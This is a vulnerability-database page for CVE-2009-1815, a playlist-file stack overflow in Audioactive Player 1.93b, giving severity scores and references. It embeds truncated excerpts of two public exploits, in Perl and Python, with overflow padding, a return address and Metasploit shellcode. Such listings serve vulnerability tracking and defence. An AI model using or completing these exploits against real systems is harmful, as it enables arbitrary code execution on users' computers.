CVE-2009-1815
published 2009-05-29CVE-2009-1815: Stack-based buffer overflow in Sonic Spot Audioactive Player 1.93b allows remote attackers to execute arbitrary code via a long string in a playlist file, as…
PriorityP339critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
5.85%
92.3th percentile
Stack-based buffer overflow in Sonic Spot Audioactive Player 1.93b allows remote attackers to execute arbitrary code via a long string in a playlist file, as demonstrated by a long .mp3 URL in a .m3u file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sonicspot | audioactive_player | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Audioactive Player 1.93b - '.m3u' Local Buffer Overflow
exploitdb·2009-05-15
CVE-2009-1815 Audioactive Player 1.93b - '.m3u' Local Buffer Overflow
Audioactive Player 1.93b - '.m3u' Local Buffer Overflow
---
#!/usr/bin/perl
# by hack4love
# [email protected]
# Audioactive player v1.93b (.m3u) Local buffer Overflow Exploit
# Greetz to all my friends
# From EGYPT
##################################################################
my $bof="\x41" x 224;
my $ret="\xed\x1e\x94\x7c"; # JMP ESP ntdll.dll
my $nop="\x90" x 24;
##################################################################
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x26".
"\xac\xdf\x53\x83\xeb\xfc\xe2\xf4\xda\x44\x9b\x53\x26\xac\x54\x16".
"\x1a\x27\xa3\x56\x5e\xad\x30\xd8\x69\xb4\x54\x0c\x06\xad\x34\x1a".
"\xad\x98\x54\x52\xc8\x9d\x1f\xca\x8a\x28\x
Exploit-DB
Audioactive Player 1.93b - '.m3u' Local Buffer Overflow (SEH)
exploitdb·2009-05-15
CVE-2009-1815 Audioactive Player 1.93b - '.m3u' Local Buffer Overflow (SEH)
Audioactive Player 1.93b - '.m3u' Local Buffer Overflow (SEH)
---
#usage: exploit.py
#Open the program then double clic in the exploit file
print "**************************************************************************"
print " Audioactive Player 1.93b (.m3u) Local Buffer Overflow Exploit (SEH)\n"
print " Credits : hack4love\n"
print " Seh Exploit: His0k4\n"
print " Tested on: Windows XP Pro SP3 (EN)\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz),snakespc.com\n"
print "**************************************************************************"
# win32_exec - EXITFUNC=seh CMD=calc Size=165 Encoder=JmpCallAdditive http://metasploit.com
shellcode=(
"\xfc\xbb\x5d\x53\x65\x97\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85"
"\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\xa1\xbb\x21\x9
No writeups or analysis indexed.
http://www.securityfocus.com/bid/34987http://www.vupen.com/english/advisories/2009/1339https://www.exploit-db.com/exploits/8698https://www.exploit-db.com/exploits/8701http://www.securityfocus.com/bid/34987http://www.vupen.com/english/advisories/2009/1339https://www.exploit-db.com/exploits/8698https://www.exploit-db.com/exploits/8701
2009-05-29
Published